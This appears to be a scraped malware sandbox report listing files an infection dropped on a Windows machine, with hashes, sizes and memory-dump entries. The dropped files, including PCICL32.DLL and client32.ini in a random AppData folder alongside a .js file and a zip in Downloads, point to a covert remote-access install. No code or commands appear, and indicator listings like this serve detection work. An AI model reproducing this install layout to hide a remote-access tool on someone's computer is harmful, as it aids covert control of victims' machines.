5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\PCICL32.DLL

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\PCICL32.DLL

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\PCICL32.dll

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\client32.ini

Filesize
925B

MD5
56e2df5f12ed677741d1bebc751a2cd0

SHA1
8b3db6f517d6ddaee7fde9c133283d54498ab105

SHA256
0544a5ce433a314ffd4362645e0cec27b9db34a4eef31a441a40d98f771661f5

SHA512
3a6293cf1bf431a4daa8086244637d836467e82ab90b3f95390825bbc431c48989f02d99e76776570acfee96f196b66e7ee45ea3323bcbb2661c2dd3bd5a54a9

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\pcichek.dll

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\presentationhost.exe

Filesize
109KB

MD5
b2b27ccaded1db8ee341d5bd2c373044

SHA1
1d0f9ca17c0961eeabffc2ba54e16854a13c8a9d

SHA256
e4985a9739637aad4a409c95da33a1304dc17fd6ef9046159b27c0b137a57911

SHA512
0987b11aa110ea6b6f4fe4361e587aff010508251644bdfb681a578fa4726fb56af039d55e0b74682fd7031414f665a98656186b220264c122a47d23751dcee1

Download Submit
C:\Users\Admin\AppData\Roaming\gjcERQyb\presentationhost.exe

Filesize
109KB

MD5
b2b27ccaded1db8ee341d5bd2c373044

SHA1
1d0f9ca17c0961eeabffc2ba54e16854a13c8a9d

SHA256
e4985a9739637aad4a409c95da33a1304dc17fd6ef9046159b27c0b137a57911

SHA512
0987b11aa110ea6b6f4fe4361e587aff010508251644bdfb681a578fa4726fb56af039d55e0b74682fd7031414f665a98656186b220264c122a47d23751dcee1

Download Submit
C:\Users\Admin\Downloads\3si135636.js

Filesize
443KB

MD5
573dba5da32938dc25581307e3bc3966

SHA1
89ce043775b408b1c73d41dee3f62b188a8e4a24

SHA256
451ec140850992b68ddedad513ffb203304b2be9f0dee09a1f6116045dcf536c

SHA512
788f022a58a7e56193e98f0abacdece539f35aab8ccaa602c70bad039cf3f7fa373d95cbb19bbbfb0ae43c92aa59c84b702bcc01c1b05e2b4b20f30ac1943d24

Download Submit
C:\Users\Admin\Downloads\7052091142.zip

Filesize
103KB

MD5
ae65f36dc56afad95810d05d91452f8e

SHA1
e2a86aa1dce4191e5d9deb6212f71319951e0aed

SHA256
2e9d5f1e737c84f81750325611eb6d9d6c31ceeb28c7880d35acfc0f80ac8046

SHA512
418140e0dc5a9a2b665d24538a0b73cf8820a3cf8bbdf9c2b36cc03c9647ea84d4961fc3c5062de953bb8b692f166ca7ebe4b71e5aa53c9738984a32babd8efd

Download Submit
memory/1072-157-0x0000000000A00000-0x0000000000D9A000-memory.dmp

Filesize
3.6MB

Download
memory/1212-170-0x000001B810060000-0x000001B810B21000-memory.dmp

Filesize
10.8MB

Download
memory/1212-150-0x000001B810060000-0x000001B810B21000-memory.dmp

Filesize
10.8MB

Download
memory/1212-149-0x000001B828E50000-0x000001B828E72000-memory.dmp

Filesize
136KB

Download
memory/4176-182-0x0000000001440000-0x00000000017DA000-memory.dmp

Filesize
3.6MB

Download
memory/4736-175-0x000002656B290000-0x000002656BD51000-memory.dmp

Filesize
10.8MB

Download
memory/4736-188-0x000002656B290000-0x000002656BD51000-memory.dmp

Filesize
10.8MB

Download